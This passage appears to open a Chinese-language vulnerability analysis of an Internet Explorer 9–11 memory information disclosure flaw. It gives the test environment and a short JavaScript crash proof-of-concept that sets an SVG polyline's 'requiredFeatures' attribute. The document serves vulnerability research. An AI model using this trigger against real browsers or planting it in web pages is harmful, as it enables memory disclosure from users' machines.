Microsoft Internet Explorer 9 through 11 allows remote attackers to obtain sensitive information from process memory via a crafted web site, aka "Internet Explorer Information Disclosure Vulnerability."
0x01 漏洞成因
测试环境:win7 x64
IE10 10.0.9200.16521
漏洞crash POC如下
function trigger() {
var polyLine = document.createElementNS('http://www.w3.org/2000/svg', 'polyline');
polyLine.setAttributeNS(null, 'requiredFeatures', '\n');
}